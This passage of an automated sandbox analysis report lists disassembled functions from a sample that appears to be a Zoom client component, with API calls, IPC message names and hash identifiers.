                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Result$com.zoom.app.assistant.cec.unload.response
                • API String ID: 4281283084-445093854
                • Opcode ID: 4b10cecd55d43ae5225dcaa9d079d58ab01059e3a3bfaf86b9f68c72243a0378
                • Instruction ID: 1e3b1ab2710f53f6df1f770d70f437b355575fc7baee37f74851a8528aff044b
                • Opcode Fuzzy Hash: 4b10cecd55d43ae5225dcaa9d079d58ab01059e3a3bfaf86b9f68c72243a0378
                • Instruction Fuzzy Hash: F8E020B0900380A7E720BF148C45B2EB6A4E74171EF99052DB1055F383CFF44840E7B4
                Function 00C740C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C740C7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.notify.zp.features,00002776,originalData,00000004), ref: 00C740E2
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.notify.zp.features$originalData
                • API String ID: 3166440930-1508911518
                • Opcode ID: dcdf0cd655eb1ac0f0359b62aed8fc1268aac9e4a92cf8e8eaa7404ab940b298
                • Instruction ID: 7b7ee1db4c11a625b0dcfb6ecbf660ca5bd17ab19da224412172fd7de60912aa
                • Opcode Fuzzy Hash: dcdf0cd655eb1ac0f0359b62aed8fc1268aac9e4a92cf8e8eaa7404ab940b298
                • Instruction Fuzzy Hash: C8E0D8F1A047C067C7307B118C45B1E77B4A750B56F508528B2015F3D2CBF44984EBB4
                Function 00C700C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C700C7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.update.call.session.summary.response,00009CE4,JsonValue,00000004), ref: 00C700E2
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: JsonValue$com.zoom.app.assistant.update.call.session.summary.response
                • API String ID: 3166440930-3090541172
                • Opcode ID: 33666b7858a95b8b6d97c3ac4d7fdccecf922ec6bec061ace063d7edcdc0c76c
                • Instruction ID: 30de9060cf5f150a064b87ab809057e855b37d8f87820639f2b8457d5401a6c9
                • Opcode Fuzzy Hash: 33666b7858a95b8b6d97c3ac4d7fdccecf922ec6bec061ace063d7edcdc0c76c
                • Instruction Fuzzy Hash: 49E0D8F0A00391A7D720BB158C45F1EA6B4EB44B16F40485DB1025E3D2CBF48884DB79
                Function 00C760F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C760F7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.pmc.query.default.giphy.rsp,000027D2,defaultGiphySerializeData,00000004), ref: 00C76112
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.app.conf.pmc.query.default.giphy.rsp$defaultGiphySerializeData
                • API String ID: 3166440930-1607496937
                • Opcode ID: f086e183c99f685058de684771804330d072965830e395599ae4b44ba9071b79
                • Instruction ID: ad5b82554727d36ede96a15e03635be1b74c82ccfd044612c6eb7507ba0e96f6
                • Opcode Fuzzy Hash: f086e183c99f685058de684771804330d072965830e395599ae4b44ba9071b79
                • Instruction Fuzzy Hash: 42E0D8B0A0479167C3246B158C4AB1E66B4DB54B16F404418B6059B3D3CBF44D84DBB4
                Function 00C68040 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C68047
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.pt.meetingParamChanged,00002755,meetingToken,00000004), ref: 00C68062
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.app.pt.meetingParamChanged$meetingToken
                • API String ID: 3166440930-3328530961
                • Opcode ID: 9741fbcc4550a489f97468e1b4dc1dda29a2191b072479f38bd403127bf8ad42
                • Instruction ID: c71a5be45654ecea71c255c76a5f41e1fdaee12a55065db299137eee3bbe0bae
                • Opcode Fuzzy Hash: 9741fbcc4550a489f97468e1b4dc1dda29a2191b072479f38bd403127bf8ad42
                • Instruction Fuzzy Hash: CCE0D8B0900B9097C7216B15DC49B1E62B8AB64726F840928B2055F3D1CFF44988D775
                Function 00C6E060 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E067
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.cec.load.response,00009CD8,cecDeviceCounts,00000004), ref: 00C6E082
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: cecDeviceCounts$com.zoom.app.assistant.cec.load.response
                • API String ID: 4281283084-1765138920
                • Opcode ID: 828d29a21c00feb997f336aed91eb819871e31acbba44db4814cb490323ae572
                • Instruction ID: 5420a1a1d87273c11430b73ca1e1a16114412e7dfaf627e0a5f1b02c4a5c4358
                • Opcode Fuzzy Hash: 828d29a21c00feb997f336aed91eb819871e31acbba44db4814cb490323ae572
                • Instruction Fuzzy Hash: D1E0D8B4A4038067D7307B149C45B5E35A49B5071BF504539F2415B3D3CBF48940EBB5
                Function 00C70060 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70067
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.heartbeat.request,00009CE2,Param,00000004), ref: 00C70082
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Param$com.zoom.app.assistant.heartbeat.request
                • API String ID: 4281283084-1241254243
                • Opcode ID: aa78c453cfb9340e45e32a2bb039f936ed2efb617a612d1f674754c9e369c1d6
                • Instruction ID: 2f4f130c1132991a7b5a87ddd194a08f0f3862a1fcb05164768b62d43c13fbbc
                • Opcode Fuzzy Hash: aa78c453cfb9340e45e32a2bb039f936ed2efb617a612d1f674754c9e369c1d6
                • Instruction Fuzzy Hash: D3E0D8F0A4034097D3207B154C4AB1E66A4AB40B1AF948429B1515F3C2CBF48941EF79
                Function 00C6E000 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E007
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.check.nomadic.911.request,00009D1A,Bssid,00000004), ref: 00C6E022
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Bssid$com.zoom.app.assistant.sip.check.nomadic.911.request
                • API String ID: 3166440930-2941019768
                • Opcode ID: a9ecb7359c60f8ae7bd9b723a5307c4e1be7286c6221f626436a221614385dee
                • Instruction ID: 3a35a229f0827f7e0cb8aba0b7c5a9ba3dfc3eb4a9f57a6049e16762f365d96c
                • Opcode Fuzzy Hash: a9ecb7359c60f8ae7bd9b723a5307c4e1be7286c6221f626436a221614385dee
